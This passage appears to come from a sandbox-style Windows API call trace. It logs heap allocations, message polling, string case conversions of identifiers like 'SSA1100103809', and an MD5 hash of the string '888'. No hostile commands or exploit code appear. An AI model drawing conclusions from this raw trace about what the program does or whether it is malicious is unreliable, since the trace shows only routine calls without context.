RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0152.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0152.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0152.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.577] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0152.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0152.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0152.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0152.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0152.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0152.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0152.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0152.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0152.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0152.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0152.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0152.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.577] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0152.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0152.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0152.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0152.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0152.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0152.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0152.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0152.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0152.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0152.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0152.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0152.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.578] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0152.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0152.578] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0152.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0152.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6f0 [0152.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0152.578] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0152.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0152.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0152.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0152.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0152.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0152.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0152.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0152.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0152.579] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0152.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0152.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0152.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0152.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0152.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0152.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0152.579] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0152.579] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0152.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0152.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0152.579] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0152.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0152.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaab0 [0152.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73b30 [0152.579] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0152.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0152.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0152.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0152.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0152.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0152.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0152.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0152.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0152.580] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0152.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0152.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0152.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0152.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0152.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0152.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0152.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0152.580] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0152.580] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0152.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0152.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0152.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0152.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0152.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0152.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0152.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0152.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0152.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0152.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0152.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0152.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73b30 | out: hHeap=0x2af0000) returned 1 [0152.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0152.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0152.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0152.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0152.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0152.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0152.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0152.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0152.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0152.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0152.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0152.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0152.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0152.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0152.581] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0152.581] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0152.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0152.581] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0152.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0152.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaab0 [0152.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73d28 [0152.581] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.581] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0152.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0152.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0152.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0152.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0152.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0152.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0152.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.582] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0152.582] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0152.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0152.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0152.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0152.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0152.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0152.582] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0152.582] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0152.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.582] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.582] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.582] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.582] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.582] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.582] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0152.582] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.582] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0152.582] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.582] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.583] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0152.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaadf8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0152.583] CryptCreateHash (in: hProv=0x9be9a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0152.583] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.583] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.583] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.583] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0152.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72778, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0152.583] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0152.583] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0152.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a728f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0152.583] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.583] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.584] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.584] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.584] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.584] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.584] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0152.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaab40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0152.584] CryptHashData (hHash=0x9e20b8, pbData=0x2a726a8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0152.584] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.584] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.584] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.584] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.584] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0152.584] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.584] PeekMessageW (in: 